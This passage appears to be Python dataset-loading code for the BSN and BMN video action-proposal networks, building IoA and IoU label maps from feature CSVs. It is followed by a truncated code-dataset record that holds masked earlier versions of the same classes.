        gt_end_bboxs = np.stack((gt_xmaxs - gt_len_small / 2, gt_xmaxs + gt_len_small / 2), axis=1)    # ending regions
        # Compute the three TEM probabilities for every snippet position.
        # NOTE(review): the dense 0..temporal_scale-1 sweep does a lot of
        # redundant work when there are few GT segments; candidate for
        # later optimisation.
        match_score_action = []
        for jdx in range(len(anchor_xmin)):
            match_score_action.append(np.max(self._ioa_with_anchors(anchor_xmin[jdx], anchor_xmax[jdx], gt_xmins, gt_xmaxs)))
        match_score_start = []
        for jdx in range(len(anchor_xmin)):
            match_score_start.append(np.max(self._ioa_with_anchors(anchor_xmin[jdx], anchor_xmax[jdx], gt_start_bboxs[:, 0], gt_start_bboxs[:, 1])))
        match_score_end = []
        for jdx in range(len(anchor_xmin)):
            match_score_end.append(np.max(self._ioa_with_anchors(anchor_xmin[jdx], anchor_xmax[jdx], gt_end_bboxs[:, 0], gt_end_bboxs[:, 1])))
        match_score_action = torch.Tensor(match_score_action)
        match_score_start = torch.Tensor(match_score_start)
        match_score_end = torch.Tensor(match_score_end)
        # Three probability sequences, each of length temporal_scale.
        return match_score_action, match_score_start, match_score_end

    def _ioa_with_anchors(self, anchors_min, anchors_max, box_min, box_max):
        """Intersection length over anchor length for one anchor vs. box arrays."""
        len_anchors = anchors_max - anchors_min
        int_xmin = np.maximum(anchors_min, box_min)
        int_xmax = np.minimum(anchors_max, box_max)
        inter_len = np.maximum(int_xmax - int_xmin, 0.)
        scores = np.divide(inter_len, len_anchors)
        return scores

    def _ioa(self, anchors, gts):
        """Vectorised IoA for row-aligned (N, 2) anchor and gt arrays.

        NOTE(review): the original body computed the intermediates, ran a
        stray no-op ``np.maximum`` expression and fell through returning
        None; completed here to mirror ``_ioa_with_anchors``. Unused in
        the visible code.
        """
        len_anchors = anchors[:, 1] - anchors[:, 0]
        int_min = np.maximum(anchors[:, 0], gts[:, 0])
        int_max = np.minimum(anchors[:, 1], gts[:, 1])
        inter_len = np.maximum(int_max - int_min, 0.)
        return np.divide(inter_len, len_anchors)

    def __len__(self):
        return len(self.video_list)
class ProposalDataSet(data.Dataset):
    """Proposal-level dataset for the PEM stage of BSN.

    Serves the top-K proposals of each video together with their BSP
    features; in train mode also the precomputed IoU target per proposal,
    otherwise the proposal boundaries and boundary scores.
    """

    def __init__(self, opt, subset="train"):
        self.subset = subset
        self.mode = opt["mode"]
        if self.mode == "train":  # training and inference keep a different number of proposals
            self.top_K = opt["pem_top_K"]
        else:
            self.top_K = opt["pem_top_K_inference"]
        self.video_info_path = opt["video_info"]
        self.video_anno_path = opt["video_anno"]
        self.feature_path = opt["feature_path"]      # directory holding the per-video feature csv files
        self.temporal_scale = opt["temporal_scale"]  # temporal length; every video rescaled to this many snippets (e.g. 100)
        self._getDatasetDict()
        self.check_csv()

    def check_csv(self):
        """Drop videos whose feature csv is missing, plus known-bad samples.

        Some feature files may be absent or corrupted on disk.
        """
        # Iterate over a snapshot: removing from self.video_list while
        # iterating it directly would silently skip the element after
        # every removal (bug in the original version).
        for video in list(self.video_list):
            if not os.path.exists(self.feature_path + "csv_mean_" + str(self.temporal_scale) + "/" + video + ".csv"):
                print("video :{} feature csv is not existed".format(video))
                self.video_list.remove(video)
                del self.video_dict[video]
        # Remove samples that are known to be broken.
        del_videl_list = ['v_5HW6mjZZvtY']
        for v in del_videl_list:
            if v in self.video_dict:
                print("del " + v + ' video')
                self.video_list.remove(v)
                del self.video_dict[v]
        print("After check: csv \n %s subset video numbers: %d" % (self.subset, len(self.video_list)))

    def _getDatasetDict(self):
        """Build self.video_dict / self.video_list for the requested subset."""
        anno_df = pd.read_csv(self.video_info_path)       # per-video meta information
        anno_database = load_json(self.video_anno_path)   # per-video ground-truth annotations
        self.video_dict = {}
        for i in range(len(anno_df)):
            video_name = anno_df.video.values[i]
            video_info = anno_database[video_name]
            video_subset = anno_df.subset.values[i]
            if self.subset == "full":
                self.video_dict[video_name] = video_info
            if self.subset in video_subset:
                self.video_dict[video_name] = video_info
        self.video_list = list(self.video_dict.keys())
        print("%s subset video numbers: %d" % (self.subset, len(self.video_list)))

    def __len__(self):
        return len(self.video_list)

    def __getitem__(self, index):
        """Return the top-K proposal features (+ IoU targets in train mode)."""
        video_name = self.video_list[index]
        pdf = pandas.read_csv("./output/PGM_proposals/" + video_name + ".csv")  # candidate proposals
        pdf = pdf[:self.top_K]
        video_feature = numpy.load("./output/PGM_feature/" + video_name + ".npy")  # BSP feature for each proposal
        video_feature = video_feature[:self.top_K, :]
        video_feature = torch.Tensor(video_feature)
        if self.mode == "train":
            # IoU with ground truth, precomputed during TEM inference, is the regression target.
            video_match_iou = torch.Tensor(pdf.match_iou.values[:])
            return video_feature, video_match_iou  # [bs, 32], [bs]
        else:
            # Proposal starting/ending locations and their boundary scores,
            # needed for post-processing at inference time.
            video_xmin = pdf.xmin.values[:]
            video_xmax = pdf.xmax.values[:]
            video_xmin_score = pdf.xmin_score.values[:]
            video_xmax_score = pdf.xmax_score.values[:]
            return video_feature, video_xmin, video_xmax, video_xmin_score, video_xmax_score
def load_json(file):
    """Read *file* as JSON and return the decoded object."""
    with open(file) as fp:
        return json.load(fp)
class BMN_VideoDataSet(data.Dataset):
    """Video-level dataset for the BMN network.

    Each training item yields the snippet feature sequence of one video
    together with the BM confidence-map label and the start/end
    probability-sequence labels; inference items are ``(index, feature)``.
    """

    def __init__(self, opt, subset="train"):
        self.temporal_scale = opt["temporal_scale"]  # number of snippets per video, e.g. 100
        self.temporal_gap = 1. / self.temporal_scale
        self.subset = subset
        self.mode = opt["mode"]
        self.feature_path = opt["feature_path"]
        self.video_info_path = opt["video_info"]
        self.video_anno_path = opt["video_anno"]
        self._getDatasetDict()
        self.check_csv()
        self._get_match_map()

    def check_csv(self):
        """Drop videos whose feature csv is missing or damaged, plus known-bad samples.

        Iterates over a snapshot (``list(...)``) of ``self.video_list``: the
        original iterated the list it was removing from, which silently skips
        the element that follows every removal.
        """
        for video in list(self.video_list):
            if not os.path.exists(self.feature_path + "csv_mean_" + str(self.temporal_scale) + "/" + video + ".csv"):
                print("video :{} feature csv is not existed".format(video))
                self.video_list.remove(video)
                del self.video_dict[video]
        # Remove samples known to be corrupted.
        del_videl_list = ['v_5HW6mjZZvtY']
        for v in del_videl_list:
            if v in self.video_dict:
                print("del " + v + ' video')
                self.video_list.remove(v)
                del self.video_dict[v]
        print("After check: csv \n %s subset video numbers: %d" % (self.subset, len(self.video_list)))

    def _getDatasetDict(self):
        """Build ``self.video_dict`` / ``self.video_list`` for the requested subset."""
        anno_df = pd.read_csv(self.video_info_path)
        anno_database = load_json(self.video_anno_path)
        self.video_dict = {}
        for i in range(len(anno_df)):
            video_name = anno_df.video.values[i]
            video_info = anno_database[video_name]
            video_subset = anno_df.subset.values[i]
            if self.subset in video_subset:
                self.video_dict[video_name] = video_info
        self.video_list = list(self.video_dict.keys())
        print("%s subset video numbers: %d" % (self.subset, len(self.video_list)))

    def __getitem__(self, index):
        video_data = self._load_file(index)  # snippet features, [C, T] e.g. [400, 100]
        if self.mode == "train":
            # Labels: start/end probability sequences [T] and BM confidence map [T, T].
            match_score_start, match_score_end, confidence_score = self._get_train_label(index, self.anchor_xmin,
                                                                                         self.anchor_xmax)
            return video_data, confidence_score, match_score_start, match_score_end
        else:
            return index, video_data

    def _get_match_map(self):
        """Precompute the BM-map proposal spans and the per-snippet anchors."""
        match_map = []
        for idx in range(self.temporal_scale):
            tmp_match_window = []
            xmin = self.temporal_gap * idx  # normalized start location
            for jdx in range(1, self.temporal_scale + 1):
                xmax = xmin + self.temporal_gap * jdx  # end location = start + duration
                tmp_match_window.append([xmin, xmax])
            match_map.append(tmp_match_window)
        # [start, duration, 2]: temporal span of every candidate proposal on the BM map.
        match_map = np.array(match_map)
        # -> [duration, start, 2]: [0.00,0.01] [0.01,0.02] ... per row.
        match_map = np.transpose(match_map, [1, 0, 2])
        # Flatten to [T*T, 2]; duration is constant within a row, start within a column.
        match_map = np.reshape(match_map, [-1, 2])
        self.match_map = match_map
        # Start / end time of every snippet (each snippet window is centered on its index).
        self.anchor_xmin = [self.temporal_gap * (i - 0.5) for i in range(self.temporal_scale)]
        self.anchor_xmax = [self.temporal_gap * (i + 0.5) for i in range(1, self.temporal_scale + 1)]
        # NOTE(review): unlike BSN these anchors are shifted by 0.5 snippets;
        # whether the shift affects accuracy was left as an open question by
        # the original author — confirm experimentally before changing it.

    def _load_file(self, index):
        """Load the rescaled feature csv of one video as a float tensor of shape [C, T]."""
        video_name = self.video_list[index]
        video_df = pd.read_csv(self.feature_path + "csv_mean_" + str(self.temporal_scale) + "/" + video_name + ".csv")
        video_data = video_df.values[:, :]
        video_data = torch.Tensor(video_data)
        video_data = torch.transpose(video_data, 0, 1)
        # The original called video_data.float() and discarded the result;
        # assign it (a no-op for an already-float tensor, but now explicit).
        video_data = video_data.float()
        return video_data

    def _get_train_label(self, index, anchor_xmin, anchor_xmax):
        """Build the three ground-truth tensors for one video.

        Returns:
            match_score_start: [T] max ioa of each snippet with the widened start regions.
            match_score_end:   [T] max ioa of each snippet with the widened end regions.
            gt_iou_map:        [T, T] max IoU of every candidate proposal with any gt segment.
        """
        video_name = self.video_list[index]
        video_info = self.video_dict[video_name]
        video_frame = video_info['duration_frame']
        video_second = video_info['duration_second']
        feature_frame = video_info['feature_frame']
        corrected_second = float(feature_frame) / video_frame * video_second  # there are some frames not used
        video_labels = video_info['annotations']  # the measurement is second, not frame
        ##############################################################################################
        # Change the measurement from seconds to a [0, 1] percentage of the video.
        gt_bbox = []
        gt_iou_map = []
        for j in range(len(video_labels)):
            tmp_info = video_labels[j]
            tmp_start = max(min(1, tmp_info['segment'][0] / corrected_second), 0)  # clamp to [0, 1]
            tmp_end = max(min(1, tmp_info['segment'][1] / corrected_second), 0)
            gt_bbox.append([tmp_start, tmp_end])
            # IoU of every candidate proposal with this gt segment.
            tmp_gt_iou_map = iou_with_anchors(
                self.match_map[:, 0], self.match_map[:, 1], tmp_start, tmp_end)
            tmp_gt_iou_map = np.reshape(tmp_gt_iou_map,
                                        [self.temporal_scale, self.temporal_scale])  # label of the BM map
            gt_iou_map.append(tmp_gt_iou_map)
        gt_iou_map = np.array(gt_iou_map)  # [num_gt, T, T]
        gt_iou_map = np.max(gt_iou_map, axis=0)  # keep the best IoU per proposal -> [T, T]
        gt_iou_map = torch.Tensor(gt_iou_map)
        ##############################################################################################
        ####################################################################################################
        # Generate R_s and R_e: widened regions around each gt start / end boundary.
        gt_bbox = np.array(gt_bbox)
        gt_xmins = gt_bbox[:, 0]
        gt_xmaxs = gt_bbox[:, 1]
        # Fixed absolute width (3 snippets) is used instead of a ratio of the gt length.
        gt_len_small = 3 * self.temporal_gap
        gt_start_bboxs = np.stack((gt_xmins - gt_len_small / 2, gt_xmins + gt_len_small / 2), axis=1)
        gt_end_bboxs = np.stack((gt_xmaxs - gt_len_small / 2, gt_xmaxs + gt_len_small / 2), axis=1)
        #####################################################################################################
        ##########################################################################################################
        # Calculate the ioa for every timestamp: ground truth of the two probability sequences.
        match_score_start = []
        for jdx in range(len(anchor_xmin)):  # for each snippet anchor, take the max ioa over all gt regions
            match_score_start.append(np.max(
                ioa_with_anchors(anchor_xmin[jdx], anchor_xmax[jdx], gt_start_bboxs[:, 0], gt_start_bboxs[:, 1])))
        match_score_end = []
        for jdx in range(len(anchor_xmin)):
            match_score_end.append(np.max(
                ioa_with_anchors(anchor_xmin[jdx], anchor_xmax[jdx], gt_end_bboxs[:, 0], gt_end_bboxs[:, 1])))
        match_score_start = torch.Tensor(match_score_start)
        match_score_end = torch.Tensor(match_score_end)
        ############################################################################################################
        return match_score_start, match_score_end, gt_iou_map  # [T], [T], [T, T]

    def __len__(self):
        return len(self.video_list)
def ioa_with_anchors(anchors_min, anchors_max, box_min, box_max):
    """Overlap length between anchor and box, normalized by the anchor length.

    Used as the supervision signal; the anchor length here is 0.01.
    Inputs may be scalars or numpy arrays (broadcast together).
    """
    overlap_lo = np.maximum(anchors_min, box_min)
    overlap_hi = np.minimum(anchors_max, box_max)
    # Clamp at 0 so disjoint spans score 0 rather than going negative.
    intersection = np.maximum(overlap_hi - overlap_lo, 0.)
    return np.divide(intersection, anchors_max - anchors_min)
def iou_with_anchors(anchors_min, anchors_max, box_min, box_max):
    """Compute the Jaccard (IoU) score between a box and the anchors.

    Inputs may be scalars or numpy arrays (broadcast together).
    """
    overlap_lo = np.maximum(anchors_min, box_min)
    overlap_hi = np.minimum(anchors_max, box_max)
    # Clamp at 0 so disjoint spans contribute no intersection.
    intersection = np.maximum(overlap_hi - overlap_lo, 0.)
    span = anchors_max - anchors_min
    union = span - intersection + box_max - box_min
    return np.divide(intersection, union)
if __name__ == '__main__':
    import opts

    opt = vars(opts.parse_opt())
    # Smoke-test the BMN dataset: fetch a single training batch and print
    # the shapes of the feature tensor and the three label tensors.
    loader = torch.utils.data.DataLoader(
        BMN_VideoDataSet(opt, subset="train"),
        batch_size=opt["bmn_batch_size"],
        shuffle=True,
        num_workers=8,
        pin_memory=True)
    for feats, conf_map, start_scores, end_scores in loader:
        print(feats.shape, conf_map.shape, start_scores.shape, end_scores.shape)
        break
|
normal
|
{
"blob_id": "e5b5a0c8c0cbe4862243548b3661057240e9d8fd",
"index": 6077,
"step-1": "<mask token>\n\n\nclass VideoDataSet(data.Dataset):\n <mask token>\n\n def check_csv(self):\n for video in self.video_list:\n if not os.path.exists(self.feature_path + 'csv_mean_' + str(\n self.temporal_scale) + '/' + video + '.csv'):\n print('video :{} feature csv is not existed'.format(video))\n self.video_list.remove(video)\n del self.video_dict[video]\n del_videl_list = ['v_5HW6mjZZvtY']\n for v in del_videl_list:\n if v in self.video_dict:\n print('del ' + v + ' video')\n self.video_list.remove(v)\n del self.video_dict[v]\n print('After check: csv \\n %s subset video numbers: %d' % (self.\n subset, len(self.video_list)))\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass ProposalDataSet(data.Dataset):\n\n def __init__(self, opt, subset='train'):\n self.subset = subset\n self.mode = opt['mode']\n if self.mode == 'train':\n self.top_K = opt['pem_top_K']\n else:\n self.top_K = opt['pem_top_K_inference']\n self.video_info_path = opt['video_info']\n self.video_anno_path = opt['video_anno']\n self.feature_path = opt['feature_path']\n self.temporal_scale = opt['temporal_scale']\n self._getDatasetDict()\n self.check_csv()\n\n def check_csv(self):\n for video in self.video_list:\n if not os.path.exists(self.feature_path + 'csv_mean_' + str(\n self.temporal_scale) + '/' + video + '.csv'):\n print('video :{} feature csv is not existed'.format(video))\n self.video_list.remove(video)\n del self.video_dict[video]\n del_videl_list = ['v_5HW6mjZZvtY']\n for v in del_videl_list:\n if v in self.video_dict:\n print('del ' + v + ' video')\n self.video_list.remove(v)\n del self.video_dict[v]\n print('After check: csv \\n %s subset video numbers: %d' % (self.\n subset, len(self.video_list)))\n\n def _getDatasetDict(self):\n anno_df = pd.read_csv(self.video_info_path)\n anno_database = load_json(self.video_anno_path)\n self.video_dict = {}\n for i in range(len(anno_df)):\n video_name = 
anno_df.video.values[i]\n video_info = anno_database[video_name]\n video_subset = anno_df.subset.values[i]\n if self.subset == 'full':\n self.video_dict[video_name] = video_info\n if self.subset in video_subset:\n self.video_dict[video_name] = video_info\n self.video_list = list(self.video_dict.keys())\n print('%s subset video numbers: %d' % (self.subset, len(self.\n video_list)))\n\n def __len__(self):\n return len(self.video_list)\n\n def __getitem__(self, index):\n video_name = self.video_list[index]\n pdf = pandas.read_csv('./output/PGM_proposals/' + video_name + '.csv')\n pdf = pdf[:self.top_K]\n video_feature = numpy.load('./output/PGM_feature/' + video_name +\n '.npy')\n video_feature = video_feature[:self.top_K, :]\n video_feature = torch.Tensor(video_feature)\n if self.mode == 'train':\n video_match_iou = torch.Tensor(pdf.match_iou.values[:])\n return video_feature, video_match_iou\n else:\n video_xmin = pdf.xmin.values[:]\n video_xmax = pdf.xmax.values[:]\n video_xmin_score = pdf.xmin_score.values[:]\n video_xmax_score = pdf.xmax_score.values[:]\n return (video_feature, video_xmin, video_xmax, video_xmin_score,\n video_xmax_score)\n\n\n<mask token>\n\n\nclass BMN_VideoDataSet(data.Dataset):\n\n def __init__(self, opt, subset='train'):\n self.temporal_scale = opt['temporal_scale']\n self.temporal_gap = 1.0 / self.temporal_scale\n self.subset = subset\n self.mode = opt['mode']\n self.feature_path = opt['feature_path']\n self.video_info_path = opt['video_info']\n self.video_anno_path = opt['video_anno']\n self._getDatasetDict()\n self.check_csv()\n self._get_match_map()\n\n def check_csv(self):\n for video in self.video_list:\n if not os.path.exists(self.feature_path + 'csv_mean_' + str(\n self.temporal_scale) + '/' + video + '.csv'):\n print('video :{} feature csv is not existed'.format(video))\n self.video_list.remove(video)\n del self.video_dict[video]\n del_videl_list = ['v_5HW6mjZZvtY']\n for v in del_videl_list:\n if v in self.video_dict:\n print('del 
' + v + ' video')\n self.video_list.remove(v)\n del self.video_dict[v]\n print('After check: csv \\n %s subset video numbers: %d' % (self.\n subset, len(self.video_list)))\n\n def _getDatasetDict(self):\n anno_df = pd.read_csv(self.video_info_path)\n anno_database = load_json(self.video_anno_path)\n self.video_dict = {}\n for i in range(len(anno_df)):\n video_name = anno_df.video.values[i]\n video_info = anno_database[video_name]\n video_subset = anno_df.subset.values[i]\n if self.subset in video_subset:\n self.video_dict[video_name] = video_info\n self.video_list = list(self.video_dict.keys())\n print('%s subset video numbers: %d' % (self.subset, len(self.\n video_list)))\n\n def __getitem__(self, index):\n video_data = self._load_file(index)\n if self.mode == 'train':\n match_score_start, match_score_end, confidence_score = (self.\n _get_train_label(index, self.anchor_xmin, self.anchor_xmax))\n return (video_data, confidence_score, match_score_start,\n match_score_end)\n else:\n return index, video_data\n\n def _get_match_map(self):\n match_map = []\n for idx in range(self.temporal_scale):\n tmp_match_window = []\n xmin = self.temporal_gap * idx\n for jdx in range(1, self.temporal_scale + 1):\n xmax = xmin + self.temporal_gap * jdx\n tmp_match_window.append([xmin, xmax])\n match_map.append(tmp_match_window)\n match_map = np.array(match_map)\n match_map = np.transpose(match_map, [1, 0, 2])\n match_map = np.reshape(match_map, [-1, 2])\n self.match_map = match_map\n self.anchor_xmin = [(self.temporal_gap * (i - 0.5)) for i in range(\n self.temporal_scale)]\n self.anchor_xmax = [(self.temporal_gap * (i + 0.5)) for i in range(\n 1, self.temporal_scale + 1)]\n\n def _load_file(self, index):\n video_name = self.video_list[index]\n video_df = pd.read_csv(self.feature_path + 'csv_mean_' + str(self.\n temporal_scale) + '/' + video_name + '.csv')\n video_data = video_df.values[:, :]\n video_data = torch.Tensor(video_data)\n video_data = torch.transpose(video_data, 0, 1)\n 
video_data.float()\n return video_data\n\n def _get_train_label(self, index, anchor_xmin, anchor_xmax):\n video_name = self.video_list[index]\n video_info = self.video_dict[video_name]\n video_frame = video_info['duration_frame']\n video_second = video_info['duration_second']\n feature_frame = video_info['feature_frame']\n corrected_second = float(feature_frame) / video_frame * video_second\n video_labels = video_info['annotations']\n gt_bbox = []\n gt_iou_map = []\n for j in range(len(video_labels)):\n tmp_info = video_labels[j]\n tmp_start = max(min(1, tmp_info['segment'][0] /\n corrected_second), 0)\n tmp_end = max(min(1, tmp_info['segment'][1] / corrected_second), 0)\n gt_bbox.append([tmp_start, tmp_end])\n tmp_gt_iou_map = iou_with_anchors(self.match_map[:, 0], self.\n match_map[:, 1], tmp_start, tmp_end)\n tmp_gt_iou_map = np.reshape(tmp_gt_iou_map, [self.\n temporal_scale, self.temporal_scale])\n gt_iou_map.append(tmp_gt_iou_map)\n gt_iou_map = np.array(gt_iou_map)\n gt_iou_map = np.max(gt_iou_map, axis=0)\n gt_iou_map = torch.Tensor(gt_iou_map)\n gt_bbox = np.array(gt_bbox)\n gt_xmins = gt_bbox[:, 0]\n gt_xmaxs = gt_bbox[:, 1]\n gt_lens = gt_xmaxs - gt_xmins\n gt_len_small = 3 * self.temporal_gap\n gt_start_bboxs = np.stack((gt_xmins - gt_len_small / 2, gt_xmins + \n gt_len_small / 2), axis=1)\n gt_end_bboxs = np.stack((gt_xmaxs - gt_len_small / 2, gt_xmaxs + \n gt_len_small / 2), axis=1)\n match_score_start = []\n for jdx in range(len(anchor_xmin)):\n match_score_start.append(np.max(ioa_with_anchors(anchor_xmin[\n jdx], anchor_xmax[jdx], gt_start_bboxs[:, 0],\n gt_start_bboxs[:, 1])))\n match_score_end = []\n for jdx in range(len(anchor_xmin)):\n match_score_end.append(np.max(ioa_with_anchors(anchor_xmin[jdx],\n anchor_xmax[jdx], gt_end_bboxs[:, 0], gt_end_bboxs[:, 1])))\n match_score_start = torch.Tensor(match_score_start)\n match_score_end = torch.Tensor(match_score_end)\n return match_score_start, match_score_end, gt_iou_map\n\n def __len__(self):\n 
return len(self.video_list)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass VideoDataSet(data.Dataset):\n\n def __init__(self, opt, subset='train'):\n self.temporal_scale = opt['temporal_scale']\n self.temporal_gap = 1.0 / self.temporal_scale\n self.subset = subset\n self.mode = opt['mode']\n self.feature_path = opt['feature_path']\n self.boundary_ratio = opt['boundary_ratio']\n self.video_info_path = opt['video_info']\n self.video_anno_path = opt['video_anno']\n self._getDatasetDict()\n self.check_csv()\n\n def check_csv(self):\n for video in self.video_list:\n if not os.path.exists(self.feature_path + 'csv_mean_' + str(\n self.temporal_scale) + '/' + video + '.csv'):\n print('video :{} feature csv is not existed'.format(video))\n self.video_list.remove(video)\n del self.video_dict[video]\n del_videl_list = ['v_5HW6mjZZvtY']\n for v in del_videl_list:\n if v in self.video_dict:\n print('del ' + v + ' video')\n self.video_list.remove(v)\n del self.video_dict[v]\n print('After check: csv \\n %s subset video numbers: %d' % (self.\n subset, len(self.video_list)))\n\n def _getDatasetDict(self):\n anno_df = pd.read_csv(self.video_info_path)\n anno_database = load_json(self.video_anno_path)\n self.video_dict = {}\n for i in range(len(anno_df)):\n video_name = anno_df.video.values[i]\n video_info = anno_database[video_name]\n video_subset = anno_df.subset.values[i]\n if self.subset == 'full':\n self.video_dict[video_name] = video_info\n if self.subset in video_subset:\n self.video_dict[video_name] = video_info\n self.video_list = list(self.video_dict.keys())\n print('Before check: csv \\n %s subset video numbers: %d' % (self.\n subset, len(self.video_list)))\n <mask token>\n\n def _get_base_data(self, index):\n video_name = self.video_list[index]\n anchor_xmin = [(self.temporal_gap * i) for i in range(self.\n temporal_scale)]\n anchor_xmax = [(self.temporal_gap * i) for i in range(1, self.\n temporal_scale + 1)]\n try:\n video_df = pd.read_csv(self.feature_path + 'csv_mean_' + str(\n self.temporal_scale) + '/' + 
video_name + '.csv')\n except:\n print('Error in ' + video_name + '.csv')\n video_data = video_df.values[:, :]\n video_data = torch.Tensor(video_data)\n video_data = torch.transpose(video_data, 0, 1)\n video_data.float()\n return video_data, anchor_xmin, anchor_xmax\n <mask token>\n <mask token>\n <mask token>\n\n def __len__(self):\n return len(self.video_list)\n\n\nclass ProposalDataSet(data.Dataset):\n\n def __init__(self, opt, subset='train'):\n self.subset = subset\n self.mode = opt['mode']\n if self.mode == 'train':\n self.top_K = opt['pem_top_K']\n else:\n self.top_K = opt['pem_top_K_inference']\n self.video_info_path = opt['video_info']\n self.video_anno_path = opt['video_anno']\n self.feature_path = opt['feature_path']\n self.temporal_scale = opt['temporal_scale']\n self._getDatasetDict()\n self.check_csv()\n\n def check_csv(self):\n for video in self.video_list:\n if not os.path.exists(self.feature_path + 'csv_mean_' + str(\n self.temporal_scale) + '/' + video + '.csv'):\n print('video :{} feature csv is not existed'.format(video))\n self.video_list.remove(video)\n del self.video_dict[video]\n del_videl_list = ['v_5HW6mjZZvtY']\n for v in del_videl_list:\n if v in self.video_dict:\n print('del ' + v + ' video')\n self.video_list.remove(v)\n del self.video_dict[v]\n print('After check: csv \\n %s subset video numbers: %d' % (self.\n subset, len(self.video_list)))\n\n def _getDatasetDict(self):\n anno_df = pd.read_csv(self.video_info_path)\n anno_database = load_json(self.video_anno_path)\n self.video_dict = {}\n for i in range(len(anno_df)):\n video_name = anno_df.video.values[i]\n video_info = anno_database[video_name]\n video_subset = anno_df.subset.values[i]\n if self.subset == 'full':\n self.video_dict[video_name] = video_info\n if self.subset in video_subset:\n self.video_dict[video_name] = video_info\n self.video_list = list(self.video_dict.keys())\n print('%s subset video numbers: %d' % (self.subset, len(self.\n video_list)))\n\n def 
__len__(self):\n return len(self.video_list)\n\n def __getitem__(self, index):\n video_name = self.video_list[index]\n pdf = pandas.read_csv('./output/PGM_proposals/' + video_name + '.csv')\n pdf = pdf[:self.top_K]\n video_feature = numpy.load('./output/PGM_feature/' + video_name +\n '.npy')\n video_feature = video_feature[:self.top_K, :]\n video_feature = torch.Tensor(video_feature)\n if self.mode == 'train':\n video_match_iou = torch.Tensor(pdf.match_iou.values[:])\n return video_feature, video_match_iou\n else:\n video_xmin = pdf.xmin.values[:]\n video_xmax = pdf.xmax.values[:]\n video_xmin_score = pdf.xmin_score.values[:]\n video_xmax_score = pdf.xmax_score.values[:]\n return (video_feature, video_xmin, video_xmax, video_xmin_score,\n video_xmax_score)\n\n\n<mask token>\n\n\nclass BMN_VideoDataSet(data.Dataset):\n\n def __init__(self, opt, subset='train'):\n self.temporal_scale = opt['temporal_scale']\n self.temporal_gap = 1.0 / self.temporal_scale\n self.subset = subset\n self.mode = opt['mode']\n self.feature_path = opt['feature_path']\n self.video_info_path = opt['video_info']\n self.video_anno_path = opt['video_anno']\n self._getDatasetDict()\n self.check_csv()\n self._get_match_map()\n\n def check_csv(self):\n for video in self.video_list:\n if not os.path.exists(self.feature_path + 'csv_mean_' + str(\n self.temporal_scale) + '/' + video + '.csv'):\n print('video :{} feature csv is not existed'.format(video))\n self.video_list.remove(video)\n del self.video_dict[video]\n del_videl_list = ['v_5HW6mjZZvtY']\n for v in del_videl_list:\n if v in self.video_dict:\n print('del ' + v + ' video')\n self.video_list.remove(v)\n del self.video_dict[v]\n print('After check: csv \\n %s subset video numbers: %d' % (self.\n subset, len(self.video_list)))\n\n def _getDatasetDict(self):\n anno_df = pd.read_csv(self.video_info_path)\n anno_database = load_json(self.video_anno_path)\n self.video_dict = {}\n for i in range(len(anno_df)):\n video_name = 
anno_df.video.values[i]\n video_info = anno_database[video_name]\n video_subset = anno_df.subset.values[i]\n if self.subset in video_subset:\n self.video_dict[video_name] = video_info\n self.video_list = list(self.video_dict.keys())\n print('%s subset video numbers: %d' % (self.subset, len(self.\n video_list)))\n\n def __getitem__(self, index):\n video_data = self._load_file(index)\n if self.mode == 'train':\n match_score_start, match_score_end, confidence_score = (self.\n _get_train_label(index, self.anchor_xmin, self.anchor_xmax))\n return (video_data, confidence_score, match_score_start,\n match_score_end)\n else:\n return index, video_data\n\n def _get_match_map(self):\n match_map = []\n for idx in range(self.temporal_scale):\n tmp_match_window = []\n xmin = self.temporal_gap * idx\n for jdx in range(1, self.temporal_scale + 1):\n xmax = xmin + self.temporal_gap * jdx\n tmp_match_window.append([xmin, xmax])\n match_map.append(tmp_match_window)\n match_map = np.array(match_map)\n match_map = np.transpose(match_map, [1, 0, 2])\n match_map = np.reshape(match_map, [-1, 2])\n self.match_map = match_map\n self.anchor_xmin = [(self.temporal_gap * (i - 0.5)) for i in range(\n self.temporal_scale)]\n self.anchor_xmax = [(self.temporal_gap * (i + 0.5)) for i in range(\n 1, self.temporal_scale + 1)]\n\n def _load_file(self, index):\n video_name = self.video_list[index]\n video_df = pd.read_csv(self.feature_path + 'csv_mean_' + str(self.\n temporal_scale) + '/' + video_name + '.csv')\n video_data = video_df.values[:, :]\n video_data = torch.Tensor(video_data)\n video_data = torch.transpose(video_data, 0, 1)\n video_data.float()\n return video_data\n\n def _get_train_label(self, index, anchor_xmin, anchor_xmax):\n video_name = self.video_list[index]\n video_info = self.video_dict[video_name]\n video_frame = video_info['duration_frame']\n video_second = video_info['duration_second']\n feature_frame = video_info['feature_frame']\n corrected_second = float(feature_frame) / 
video_frame * video_second\n video_labels = video_info['annotations']\n gt_bbox = []\n gt_iou_map = []\n for j in range(len(video_labels)):\n tmp_info = video_labels[j]\n tmp_start = max(min(1, tmp_info['segment'][0] /\n corrected_second), 0)\n tmp_end = max(min(1, tmp_info['segment'][1] / corrected_second), 0)\n gt_bbox.append([tmp_start, tmp_end])\n tmp_gt_iou_map = iou_with_anchors(self.match_map[:, 0], self.\n match_map[:, 1], tmp_start, tmp_end)\n tmp_gt_iou_map = np.reshape(tmp_gt_iou_map, [self.\n temporal_scale, self.temporal_scale])\n gt_iou_map.append(tmp_gt_iou_map)\n gt_iou_map = np.array(gt_iou_map)\n gt_iou_map = np.max(gt_iou_map, axis=0)\n gt_iou_map = torch.Tensor(gt_iou_map)\n gt_bbox = np.array(gt_bbox)\n gt_xmins = gt_bbox[:, 0]\n gt_xmaxs = gt_bbox[:, 1]\n gt_lens = gt_xmaxs - gt_xmins\n gt_len_small = 3 * self.temporal_gap\n gt_start_bboxs = np.stack((gt_xmins - gt_len_small / 2, gt_xmins + \n gt_len_small / 2), axis=1)\n gt_end_bboxs = np.stack((gt_xmaxs - gt_len_small / 2, gt_xmaxs + \n gt_len_small / 2), axis=1)\n match_score_start = []\n for jdx in range(len(anchor_xmin)):\n match_score_start.append(np.max(ioa_with_anchors(anchor_xmin[\n jdx], anchor_xmax[jdx], gt_start_bboxs[:, 0],\n gt_start_bboxs[:, 1])))\n match_score_end = []\n for jdx in range(len(anchor_xmin)):\n match_score_end.append(np.max(ioa_with_anchors(anchor_xmin[jdx],\n anchor_xmax[jdx], gt_end_bboxs[:, 0], gt_end_bboxs[:, 1])))\n match_score_start = torch.Tensor(match_score_start)\n match_score_end = torch.Tensor(match_score_end)\n return match_score_start, match_score_end, gt_iou_map\n\n def __len__(self):\n return 